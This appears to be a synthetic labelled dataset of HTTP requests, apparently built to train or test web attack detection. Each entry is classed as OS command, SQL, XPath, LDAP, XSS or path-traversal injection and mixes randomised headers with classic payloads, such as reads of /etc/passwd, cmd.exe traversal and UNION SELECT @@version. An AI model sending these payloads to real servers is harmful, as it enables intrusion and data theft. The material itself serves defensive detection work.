User-Agent: Mozilla/7.3 (Windows; U; WinNT 5.3; rg-lj; rv:0.0.4) Gecko/74051693
UA-CPU: Sparc
UA-Disp: 8616,110,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 860x1351
Via: HTTP/4.3 www.tsBitour.gif:1
Transfer-Encoding: deflate
Upgrade: tati1/9.0, By2egw/7.7, naml/5.4, tau/2.1, 0aZt7/2.6
Warning: 144 202.212.126.14 "EZtzaaiitexz9rs" 
X-Serial-Number: 18116
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39994
Start - Id: 43407
class: OsCommanding
GET /7nP7x0/updateFe1Oeb/uHX5K/iRNe/reroefnyse1lhTtn/n7jQuBQ.jpeg?remsuntm5nfeOao=rz3YUFOe4&gelsptn=cl&Ku_.s.3uF=aaeboahuo&laUeserAkonc=2306531&8eaaeei=t9tvbot&ardNAr6re=oHd56E6uHhEE&gwhiqsZranyg2tj=poms%2B&rhhgsbrw8j4bone=916847&ybrMi=%7C++++cat+..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd+++++%7C&77-dFrVO2FZ=r2kkN HTTP/1.0
Host: 99.67.153.20
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: pAglenss-L6rdhhlU, un8-hosnsxe, o-yias, iclsf-et;q=0.0
Cache-Control: only-if-cached
Client-ip: 232.231.66.96
Cookie: rmso=ndoectrsnih;nasd=9omoousar5on;iedpchemhiasT=047973341;5rdcsaw4=zp
Cookie2: $Version="4"
Date: Tue, 29 Jan 08 16:32:44 UTC
ETag: W/"FBRRehdBHitCX2E"
Expect: hWd4dMn
From: 3vrss@buns5n.org
If-Modified-Since: Mon, 06 Dec 04 17:27:52 CET
If-Unmodified-Since: Sun, 16 Apr 06 09:21:15 UTC
If-Match: "cQHQgYrPwMbx8AWOq7gL"
If-None-Match: "Zx4BT_YUvjsydfT"
If-Range: *
Max-Forwards: 4960
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM RDdvbGF0YXBoaGNvaTFyYW5kZWRSc3NtSnMyc2luaHRNc2doZWVtZmE5ZTk=
Authorization: Basic c2g4ZzROaXA6bnBnZWQwcHU=
Range: 6-,47-768842,6146-09
Referer: /ehobhncl/rClimy/clMcd/rzjaee/Hieqn9.js
TE: trailers,gzip
Trailer: If-Range
User-Agent: meoncEhecRsnnhyneiye
UA-CPU: 68000
UA-Disp: 9885,5189,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 9788x122
Via: 2.6 www.iaE7Tao.css, 6.9 144.211.17.34, HTTP/2.0 138.161.184.6
Transfer-Encoding: deflate
Upgrade: zos/3.8, LrxEi/5.1
Warning: 667 www.eekudeq.shtml "ep6tpihnare" 
X-Forwarded-For: 207.33.218.68
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43407
Start - Id: 48950
class: XPathInjection
GET /3_dPVi4KTN9i.jpg?U8QU8G=027949968&6lmcoo6=55129+++or++1%3C+++++0eo3tI%2Fcgao%2Fw%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D06%5D+or+++49%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&xee5mforEio4v=lk1lusconnectcUi%3Bhr&grdbranni9=lVYCnUH&onNget=hpdh1roohp6laetoe HTTP/1.0
Host: www.re3egtrnt.com
Connection: iibdnait
Accept: text/*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-cache
Client-ip: 89.226.28.116
Cookie: tdOa8iajweD8h=yIUZq;aeei9u8ltr=dsataktp6m;oftq6Rtwdee=73
Cookie2: $Version="818"
Date: Sat, 26 Dec 09 01:23:33 GMT
ETag: W/"0iRi8U9FbGRb0Am5Se"
Expect: 100-continue
From: ietdnl@1aln.fr
If-Modified-Since: Thu, 25 Aug 05 12:25:48 CET
If-Unmodified-Since: Thu, 06 Aug 09 17:35:08 GMT
If-Match: *
If-None-Match: "F.JKE7ruYdOU8OICkJ"
If-Range: Sat, 03 Jul 04 20:09:58 GMT
Max-Forwards: 054
MIME-Version: 2.2
Pragma: 2olct=t
Proxy-Authorization: Digest response="bDD9738c8b7dB2ba67BAcc1DF2f5adcE"
Authorization: Basic NnplZ3Y6ZXl1aQ==
Range: 5-
Referer: /bmtnet.ace
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: nyfeee/3.5.4.9.9
UA-CPU: 68000
UA-Disp: 3657,5420,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 2276x9830
Via: ieugo/6.8 www.Tos7pO.js, 2.5 www.islun.tiff, ogpsx/1.4 www.iacLnt.png:0
Transfer-Encoding: compress
Upgrade: 6kse/1.8, ssz/9.9, tathn/5.4
Warning: 219 www.NUeeo.shtml "r8tNtaTA" 
X-Forwarded-For: 238.131.71.180
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48950
Start - Id: 46725
class: XSS
GET /o8aQeeotyep5rIw/nInfpme3_SgO7X/hn/eJ@xegtHGOdJ26apFPZD/omATHoAT2.x/ta/sitnis/kgdntHuiorn.asp?dks=gita&c9ntipau=tPCQ6O&TbfFh3=catu%5Dse&adnbs4eSain47e6=eiy&tpbma0njsdc=tl&nsqnnecenTti=Ps&seaDlFt0l=y+aLom8p&6beuTanelntu=iicpee HTTP/1.1
Host: www.6fdrpn.fr
Connection: close
Accept: image/png;q=0.5, image/*;q=0.3, audio/x-wav;q=0.2
Accept-Charset: x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: otloo-ree, tehhsaes-loE, oea-9uwpmege, o-uh
Cache-Control: l5oyen4u=waJuatd
Client-ip: 91.101.32.104
Cookie: qgllucems=v0ti(=otdisooescript-evbscript;tr=at;Qdt2o=chir5Uui;v4et=script    alert(xgeGmddrye.woaAs)script  ;o4cLrfr=gnsgtjlnttoio
Cookie2: $Version="4"
Date: Thu, 15 Dec 05 11:32:16 GMT
ETag: "yCU6lB0dTv41IMWuqIc8"
Expect: nete
From: mxoee2@lBEae77d.it
If-Modified-Since: Fri, 30 Jun 06 23:34:14 CET
If-Unmodified-Since: Tue, 09 Mar 04 19:34:14 GMT
If-Match: "m1SQd7APrOEN6bwYmm"
If-None-Match: *
If-Range: Fri, 08 Sep 06 08:07:04 CET
Max-Forwards: 95
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: yaje qine=rs3s
Authorization: NTLM Y3lsZGx0cGFnbzNvcGVzZW52R3NldGVyY2F0ZGx0cGVlbU50bWV1V0l1bGx0aA==
Range: 33-010
Referer: http://x6hrfe.it/sjxbo3ga/eSIe5e3o/hGuDqne/rtoeto6T/ddaa4ct.cgi
TE: trailers,deflate;q=0.2
Trailer: If-Unmodified-Since
User-Agent: aEeus2em4p (h89VN@SCoi; r@9wEs)
UA-CPU: 68000
UA-Disp: 257,623,16
UA-OS: Windows 98
UA-Pixels: 0307x779
Via: 9.0 www.CydrelSy.html, HTTP/2.1 61.196.249.206, HTTP/3.1 162.98.168.96:0945
Transfer-Encoding: deflate
Upgrade: ar7fy/8.9, amv/7.8
Warning: 358 www.nossb2ph.png:5 "sCntOyhhEOdpvci9" "Mon, 04 Aug 08 07:57:56 UTC"
X-Forwarded-For: 101.237.144.23
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 46725
Start - Id: 49812
class: XPathInjection
GET /t5lAa4aKw1K42Xf/oCcS6sz/tRPM/YHCNLOcmd/oQnUuY_selectZselectetc1mBM/ita.nsf?btgau=l.uzpoPP8&im=%28i+++++%3C+++++count%28sCl%2Fchild%3A%3Atext%28%29%29+and+++++j+++++%3C+++++count%28goivji%2Fchild%3A%3Acomment%28%29%29++and++++k++%3C++++count%28diek%2Fchild%3A%3A*%29++%29&enege9boFnmuto=bee&chqb2=0&ihmnheileEswbU=kGNq&oxf5aMirnieOo=%5BRc722em%5Cohostusrhn%29s&tgLt0rZ0m8is=eehat&dsads=n3vQgOLAb%40P9&eT=9677407226&4lesr3giB=o2OFVadbsl HTTP/1.1
Host: www.adto.be
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: deflate, compress;q=0.0, identity, identity
Accept-Language: bnzGelen-op;q=0.6, 6-0Vresr;q=0.7, nehatJ2n-oey, vcDi-ruaoiio;q=0.8
Cache-Control: only-if-cached
Client-ip: 248.234.57.173
Cookie: ubgsoundNt_0qhZ=151;lreecneahtE=n7ld<;u1eag3h=133888;-CDk3=10;hefru=s9crdhEs-tlsunion
Cookie2: $Version="04"
Date: Sat, 30 Apr 05 09:16:44 GMT
ETag: "kdW8H_eGzQ8nREBeLA"
Expect: 100-continue
From: Eyi42tm7@6degzo.st
If-Modified-Since: Sat, 10 May 08 11:26:41 CET
If-Unmodified-Since: Wed, 14 Mar 07 21:11:01 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 05 Feb 04 03:20:11 GMT
Max-Forwards: 548
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=H6eFyrt
Authorization: hbE9e eiza=ioIeete
Range: -786962,-08955,08-
Referer: /tkar4mcu/ursat/uao7nt9e.zip
TE: gzip;q=0.4,trailers,chunked;q=0.2
Trailer: Pragma
User-Agent: l7U59RGa5O http://www.w4ethre.cz
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 172x6984
Via: aeD/0.0 www.clysye.htm
Transfer-Encoding: identity
Upgrade: oticr3/9.7
Warning: 205 www.ttrce.htm "Tia5umnten" 
X-Forwarded-For: 153.152.40.255
X-Serial-Number: 09611302404410791541
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49812
Start - Id: 49263
class: XPathInjection
GET /SPNatrFBwaencedaom/n2e8FEX4BTX0Lfh49/nU/fjnQAUh_8Ydm/cogunbiqsoeiesw6/ocbbL/g_WhugzQ.shtml?tll6imht3Zhh=474&xt2a=gt%2Feftns%2Fn72eaU%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D1%5D++++or+++%27rbouhemr%27++%3D%27&7H=hee2itbnsSl6lotn&nrisU2saim5en=deY5_u&dddZraiobbtp=az&OntarHla=er4ddrafnzrweThue&1ONV=o1ltm0tpohnbh&XcHW4=i&tsd1rerL0=jg4j_0FnTN&ruslccd=0959680 HTTP/1.0
Host: 148.76.231.90:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: ea-g;q=0.8, geqan7m3-NotXe
Cache-Control: min-fresh=6892
Client-ip: 175.132.66.53
Cookie: _CYgxs=2;eIC1=e2WDLt;Yraon=8;m1gg=ftB;ds8pare74kdsed=6QvN3
Cookie2: $Version="395"
Date: Sat, 09 Aug 08 04:17:29 CET
ETag: W/"jGu3szARAyYEzvM"
Expect: wtti
From: lqie@4vraituc.com
If-Modified-Since: Fri, 29 Apr 05 23:55:34 GMT
If-Unmodified-Since: Wed, 20 May 09 03:32:47 UTC
If-Match: *
If-None-Match: "DMd1uBrJCgw4A5B"
If-Range: "8bMzJAtr9LETKr2"
Max-Forwards: 76
MIME-Version: 1.6
Pragma: ionp='s'
Proxy-Authorization: Basic bm9UdXk6cTBud210
Authorization: Digest uri=/epovu94.php4
Range: 560-83908
Referer: http://ijva.it/0retffnt/mt8e.mdb
TE: gzip;q=0.5
Trailer: TE
User-Agent: Mozilla/3.1 (Windows; U; Win 9x 0.9; t2-nF; rv:5.4.0) Gecko/51792439
UA-CPU: x86
UA-Disp: 8141,3666,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 666x0440
Via: 4.5 159.216.184.16, 6.0 164.19.24.113, 3.6 78.61.205.214
Transfer-Encoding: compress
Upgrade: ee0N/5.7, ya0/9.2, ekl/0.1, ersamh/6.5, Blfo/3.2
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 199.200.159.0
X-Serial-Number: 15070707581939695
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49263
Start - Id: 46201
class: PathTransversal
GET /iaenc5tEnarwense/2uFx-ku3S_T/.5JQxform/maeuit/0O38ThY5NIC/rNns15PPMfP3/ygete2e0Oeeecq/5V.jpeg?re2ynvpF=%2Fetc%2Fhttpd%2Fhttpd.conf HTTP/1.1
Host: 194.91.142.236
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=295
Client-ip: 250.173.5.46
Cookie: mt=o-CCCjTzUG;sqorbe9nv=d(>unionboot.ini;bgaj=869486
Cookie2: $Version="43"
Date: Tue, 05 Aug 08 15:55:59 UTC
ETag: W/"BwoAIQ_gJnkwh@ELCI"
Expect: 100-continue
From: meamrne@llueIt.be
If-Modified-Since: Sat, 02 Feb 08 01:40:20 UTC
If-Unmodified-Since: Fri, 20 Feb 09 21:16:22 UTC
If-Match: *
If-None-Match: "EeC9TmUiC5mCDt36AMO"
If-Range: "tO0c.-vsS2DGOFfZ"
Max-Forwards: 07
MIME-Version: 0.2
Pragma: DgnE=rE5mNas
Proxy-Authorization: Basic YWNlaTp0dVJlYw==
Authorization: Digest nonce
Range: 684-,-674552,060-
Referer: /n0eual/waask/ya6ioCts/Hustztal/Tdsali.swf
TE: gzip,trailers
Trailer: Accept
User-Agent: Mozilla/8.8 (X11; U; Open BSD i586 6.2; bi-ec; rv:7.5.5) Gecko/68413482
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 939x7286
Via: 6.5 231.32.166.77, 1.9 17.12.20.169
Transfer-Encoding: compress
Upgrade: peg/8.7, taas/9.0, SiHads/8.8, ne61as/9.8
Warning: 034 www.nkeyuho.html "s4csmi7rg" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 03479803459
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 46201
Start - Id: 45621
class: PathTransversal
GET /U4execM6@6GM@ztr6V/c1yAcJ/i.qmBo4RThibt808/eijguthwckum/ejtu/aY_dC1BUJL3TIgv.mspx?Yujz=%5DtiSetn&ixEu=15671&3Jbrc4locationvzYk=%5CWINNT%5Csystem.ini&7k@oHIstyle6tBe6=3477&c2mnssHrtrayi=rjbtRdtRruetecnyot&dcwcaTvhydhegE=7&f4je0=efaw%3C%3Buscriptt&Ec=95020034&ercn0C=hke7Pueh3li5pr&edepiakiat0c=kk%5DuOyme%3Dj&04hutssfaf8l=I%26rso&nRhetrI5ode=sBcmn1s+tz-an&A2SaG2=59596 HTTP/1.1
Host: www.n5uahfcina.be
Connection: 8d2doe
Accept: application/postscript, video/mpeg
Accept-Charset: iso-8859-6, euc-jp;q=0.9
Accept-Encoding: compress, deflate;q=0.2, identity;q=0.7, gzip;q=0.3
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 54.187.183.145
Cookie: s9tSp0a6=s
Cookie2: $Version="11"
Date: Wed, 10 Nov 04 18:53:43 GMT
ETag: W/"hYq.Qe6vS5JVPkNg"
Expect: 100-continue
From: aieelt@lnoh1ttGc.st
If-Modified-Since: Thu, 08 Apr 10 03:22:33 CET
If-Unmodified-Since: Sat, 28 Jun 08 14:49:15 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 11 Sep 06 19:44:15 GMT
Max-Forwards: 45
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic dG9pYjU6bG9Ib213Yw==
Authorization: NTLM eWJha3VubWVldmhodGhsZWRpMmVlbG5jajlVbnM4ZWFoVGFzNGUzNG9oOW9ydQ==
Range: 942-,71595-5
Referer: http://9Ttyciam.biz/twiaaho.swf
TE: deflate;q=0.2,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.2 (Machintosh; U; PPC Mac OS X 3.3; Gr-nO; rv:6.9.9) Gecko/43903373
UA-CPU: Sparc
UA-Disp: 6050,986,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0039x975
Via: FTP/3.1 www.epolm.html
Transfer-Encoding: compress
Upgrade: wdths/1.4, ocajr/8.7, hnt/8.6
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 749320741
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45621
Start - Id: 38517
class: LdapInjection
GET /rt8je7sgedA/e.HjRALSy0PD/otvee2y.shtml?nJh=%29++%28+++%7C+%28displayName%3Dhad*%29%28name++%3Dhad*++++%29%28++mail%3Dhad*++++%29&uaa7caieSn4=sm&nwaC=dc+%7Eo&foeseauqtriT=212892 HTTP/1.1
Host: www.t8tcxnlu.net:20
Connection: keep-alive
Accept: text/*;q=0.7, application/*;q=0.8, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: min-fresh=60
Client-ip: 235.169.253.171
Cookie: siasn=7
Cookie2: $Version="807"
Date: Mon, 10 Jul 06 12:09:56 CET
ETag: W/"6cabhDopjWR86jSj8-"
Expect: lsfu4ai=3wee;e2mko=metMe
From: tubi@0dr5so.de
If-Modified-Since: Sat, 17 Oct 09 17:34:26 UTC
If-Unmodified-Since: Tue, 06 Dec 05 23:37:22 GMT
If-Match: "RriZgQZrJFwxmmPU3"
If-None-Match: *
If-Range: Mon, 15 Sep 08 18:12:11 CET
Max-Forwards: 1438
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest response="Fd6C0B3D3bd244b0cA2F85cC8f1AA3cb"
Authorization: Basic aWRmcjpjZWV0Tg==
Range: -087,245-62681,-648438
Referer: /1eonrs/5ecab/sad9exf/kaoare1r.fgf
TE: gzip,deflate,trailers
Trailer: Warning
User-Agent: Mozilla/6.2 (Machintosh; U; PPC Mac OS X 3.4; 0c-qv; rv:7.5.7) Gecko/92606440
UA-CPU: 68000
UA-Disp: 8582,573,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8726x4401
Via: rtmd9i/5.0 65.119.22.161, 3.1 www.rditsrh6.jpeg
Transfer-Encoding: ehiyol; lsna=jfcsaoq1
Upgrade: piFi/9.7, A4e1/7.0, 7lsnih/3.7
Warning: 474 3.199.185.32 "psgyu2iuh9p6t" "Wed, 30 Jul 08 06:32:37 UTC"
X-Forwarded-For: 138.56.211.47
X-Serial-Number: 30599
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38517
Start - Id: 36518
class: OsCommanding
GET /PBServer/..��../..��../..��../winnt/system32/cmd.exe?/c+dir+c:0 HTTP/1.0
Host: 136.196.155.29:91984
Connection: close
Accept: image/*, audio/*
Accept-Charset: windows-1255;q=0.7, ks_c_5601-1987;q=0.9, x-mac-ce, x-mac-korean
Accept-Encoding: *;q=0.7
Accept-Language: li-OEen7;q=0.7, 8l-Aosef6o;q=0.3, n-gpi25i28;q=0.8
Cache-Control: max-age=68
Client-ip: 138.104.69.2
Cookie: meBo6xeieeseog=wowqmt;esaid73ol1ltc=22100;z8MiP6_=1uI1s23tuI;MmesteaE=94;8UB.V06iE=3\esASa
Cookie2: $Version="7"
Date: Fri, 25 May 07 17:37:04 UTC
ETag: "82ovRcbDriA.HwZ_bLf"
Expect: 100-continue
From: penb1st@ydtlidrwxO.uk
If-Modified-Since: Mon, 19 Jun 06 18:58:13 UTC
If-Unmodified-Since: Sat, 23 Jul 05 07:12:40 CET
If-Match: "@2hN50taAeHdG8U"
If-None-Match: "CNDAgVyjBN2GHE2o"
If-Range: *
Max-Forwards: 4392
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: 0eHre bae13=roeTol
Authorization: iSgy wib3ibfl=t0An8k
Range: 17-
Referer: /ht6D/8nut/isehn/adjstN/rbsriwni.php4
TE: deflate;q=0.8,gzip
Trailer: If-Modified-Since
User-Agent: Mozilla/7.5 (compatible; Konqueror/7.6; Open BSD i386; heeo; aNt1jt; rehhpn)
UA-CPU: 68000
UA-Disp: 0316,285,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9877x8489
Via: 0.5 www.lskeobo.css, det6Oh/0.4 61.167.246.80, 3.4 171.12.239.130
Transfer-Encoding: compress
Upgrade: r1teH/3.1, tnlo/6.6, Mbo1ue/5.1, faabak/8.4, hontz/8.0
Warning: 015 49.255.222.156 "ltge" "Mon, 28 Nov 05 13:36:16 GMT"
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36518
Start - Id: 39128
class: LdapInjection
POST /tAixane8r4cpeo3s8/iyEWsBwL.cfm? HTTP/1.0
Content-Length: 189
Content-Language: Y4t9f
Content-Encoding: compress
Content-Location: /eeounx.txt
Content-Type: application/x-www-form-urlencoded
Host: www.hnuoo.it
Connection: itamgtrq
Accept: */*
Accept-Encoding: identity, identity;q=0.9
Accept-Language: *;q=0.2
Cookie: cbEiyjlQse=5494955;wgne1a=aiahshgoo;Esoie=nee4etfr5ed;2ceirwoelzrTA=)( |(   cn=*o'brien*)(mail=*o    'brien*)   ;HGCu.HHb=%dgoef;fDmjxiQ@13i=rt=jd-iframe
Date: Fri, 05 Dec 08 03:21:00 CET
From: ram7smr@irtnnad7i.st
Max-Forwards: 95
Referer: http://www.eoceqd1.uk/ta0Yi/tyiatouj/arMhTeel/tRistb/n3ds.swf
User-Agent: tfni1/8.8.9.8.2

-JeodeleteshutdownRND9rcpg=scvirDp&ToohysHdgdrY=prst&0yh=603552&kInph-9hm.0wget=vari&e0gi8f=92&uKIah=xgxwSKIZ3&tssira=sH%~ns5rq&mhOfe6hfemznen=ohanta>5nt ei1?ipo&pudugtg7G8oauv=0851

End - Id: 39128
Start - Id: 45002
class: PathTransversal
GET /t6__4_8Da/mzmVgCClsY/ee8n6E3uuto2st9omIs/e.lEf0a3Rld.tmmV/Bi6echoHhgxZscriptmcI/sed5aeoistkz.shtml?taiamtEo1de=libh&ii8E3y=i%3C3%3F&ois=oXRVUnA%40eD&rS=eYBgT.0G%40qZ2&dg1bSa=%2Fhe4select&ldj6tawaIrjgae=%2Bce1bodyh%3Ba%29+6sAy&0et=iWtpqH&yBerdjiaie=aeboot.ini&ooscbse=01&tl=413&H-hxterm.=Ezbnor&qa3etcdqU8Dl=%3E&sA@xQincludeA_=collection%28+++file%3A%2F%2F%2Fc%3A%2FGn%2FtdisvT.xml++%29&thgd=E4tdewisuennase&negith=tT8qi HTTP/1.0
Host: 87.113.232.199
Connection: R8qadwa
Accept: text/*;q=0.2, application/*;q=0.1, text/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-store
Cookie: 5botiedmb1nwiHd=4374
Cookie2: $Version="13"
Date: Thu, 20 Dec 07 12:33:48 CET
ETag: "06Aqq7j6Gd0C_dK"
Expect: geoa=c7iean2o
From: SiHai3@Rl2imga.fr
If-Modified-Since: Fri, 21 Mar 08 21:37:00 UTC
If-Unmodified-Since: Mon, 13 Nov 06 13:33:16 CET
If-Match: *
If-None-Match: *
If-Range: "FzYKzj_X7HEONkjN0K3p"
Max-Forwards: 86
MIME-Version: 1.4
Pragma: osxui='s'
Proxy-Authorization: Basic b3RkdDJlYTc6bWlhVG41RUE=
Authorization: Basic cmdjaXJiYWw6UnRsdHA=
Range: 2613-116,8-,0-
Referer: /qetcd/dehNta.php
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/2.7 (Machintosh; U; PPC 5.6; cc-ra; rv:9.8.8) Gecko/22177315
UA-CPU: StrongARM
UA-Disp: 6840,695,32
UA-OS: FreeBSD
UA-Pixels: 569x3212
Via: 8.8 197.52.0.15:1, 8.2 179.204.73.161:620, 8.0 www.yreq.css
Transfer-Encoding: identity
Upgrade: Eubq/3.7
Warning: 081 www.M0ctanr.tiff "grtbt5tn" "Sun, 15 Apr 07 23:46:08 GMT"
X-Forwarded-For: 2.2.77.25
~~~~~: ~~~~~~~~~~

null

End - Id: 45002
Start - Id: 42069
class: SqlInjection
GET /sWghRb0PgnlyIV6J9@/e9cZpovl9.-VI/7raotaSxoiwchero/y8vr0eh/rilrcmm/3H.gif?d5tD=b%3Ftst&rigbeugerCtion=sebMTOx&tynutJ2y5et47r=lee&en=93ctd07etn&anmyEclde6=92898&g8woni2yh=9&7migSyzg0uQ=n7fCoshstmurteir&j1yechoegblxcatEH=h3Ib-UklnefF&s2olm4arr1n=69&5mU1Xjb9var=%27%29+++++UNION++++ALL+SELECT+++++7%2C11%2C95%2C95%2C57+++++FROM+whsrru4+++++WHERE+++%28+%27%27%3D%27&Acltnr=rTZB0u0I.95q&rhapeprrTihhttn=oNoHainputllzee%3C&TexecrTDAzqj6=besock_streamis HTTP/1.1
Host: www.Eiopife0.biz:80
Connection: 3iUlcOa
Accept: video/quicktime;q=0.7, video/mpeg
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: ihstmz4s-wtEavlb;q=0.0, et-hhistle;q=0.1, utHhvbto-6nI
Cache-Control: min-fresh=30928
Client-ip: 18.205.184.49
Cookie: Enupln4Ie8=3hL;hihorFrinuhno=ieA;tel=9417;ennCSgel=tLsuWc
Cookie2: $Version="58"
Date: Tue, 09 Feb 10 04:26:42 CET
ETag: "tDm1Qa_PX78EH6omh9.T"
Expect: dntttuy
From: mwetzo8a@ourctd.net
If-Modified-Since: Sun, 10 Dec 06 19:47:01 UTC
If-Unmodified-Since: Fri, 28 Dec 07 19:49:29 UTC
If-Match: *
If-None-Match: *
If-Range: "53ArFZHy.hlDtssOX"
Max-Forwards: 6
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: miIioo U7Eesss=eomtuaa
Authorization: Basic YTFmZm46bmhuaWti
Range: 97-55
Referer: http://www.3ohh0tTc.gov/ltul.jpeg
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: nqQr3V4f http://www.vuPf.ch
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 9544x100
Via: 1.0 161.174.53.24, HTTP/2.2 www.orfEun.js
Transfer-Encoding: deflate
Upgrade: rRlEh/1.9
Warning: 537 38.107.5.37 "lwo1hwxdnein" 
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 702887096
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42069
Start - Id: 42266
class: SqlInjection
GET /qdhiastbnceOe.nsf?modit4tvapooh=14450&ttrony=5&-ycat4U8zJQ4aH=veiGlos6iaqnG&atkunionCV=%27+union+++++select++%40%40version%2C1%2C1%2C1-- HTTP/1.0
Host: www.SAte.gov:9478
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: shift_jis;q=0.2, us-ascii;q=0.6, iso-8859-8-i, koi8-r, euc-kr;q=0.1
Accept-Encoding: gzip;q=0.0, deflate;q=0.2
Accept-Language: *
Cache-Control: max-age=337
Client-ip: 241.101.146.87
Cookie: intf=am.i_vv;aoinlyr4=55;brh=n\3~;tgi=540155;nslr=t20D.oF
Cookie2: $Version="53"
Date: Tue, 02 Jan 07 14:28:43 GMT
ETag: "iATM55F0tdxmn3EF.d6"
Expect: u69omi=hocA
From: eethwr@T5iivnsieh.be
If-Modified-Since: Sun, 10 Feb 08 20:48:28 GMT
If-Unmodified-Since: Mon, 12 Jul 04 13:53:34 GMT
If-Match: "EQygxceatCHPYE@EizCP"
If-None-Match: "7sQpvDzf-HF7pA5dBkn"
If-Range: Fri, 13 Aug 04 17:33:19 GMT
Max-Forwards: 485
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: NTLM ZWVlT2luN25CbmdyZmFla3JsbDF0YXkzZ3Rpa2xmbW4=
Authorization: tofgh dqar=hn2s
Range: 996351-59792
Referer: /Tirdkz/xsrg/o2wletgs/64aeic/ifehne.ace
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/6.7 (compatible; Konqueror/7.0; Open BSD i586; eohst; n5htmtcasi; ttnio88)
UA-CPU: PowerPC
UA-Disp: 8058,0040,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 4514x198
Via: FTP/9.7 166.205.20.231, 5.3 86.160.126.93:7
Transfer-Encoding: gb3e; rszmuo=qeq9hR
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 045 www.9aattsr.tiff:04840 "kdtngadii9anwjeo" 
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 280200406213
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42266
Start - Id: 46456
class: PathTransversal
POST /fKqwW/eLS7_yXp/du0dryf1Mq64zgvI2-/niHxNsHmPitutcZeeros/m2asm8yiaa/j5CAS7/uY7P/GBwvZV7/s@XP.jpg? HTTP/1.0
Content-Length: 163
Content-Language: tE,txesmd,bsno3
Content-Encoding: deflate
Content-Location: /mitnhm/rmle2/s4tec/ygtbegre/Ser0.mpeg
Content-MD5: cmRod3JhZWt0ZHlkYWRoNg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 23 Apr 05 15:34:04 GMT
Last-Modified: Thu, 18 Nov 04 22:13:09 CET
Host: 158.58.120.175
Connection: Ehoi
Accept: */*
Accept-Charset: iso-8859-9, x-mac-icelandic
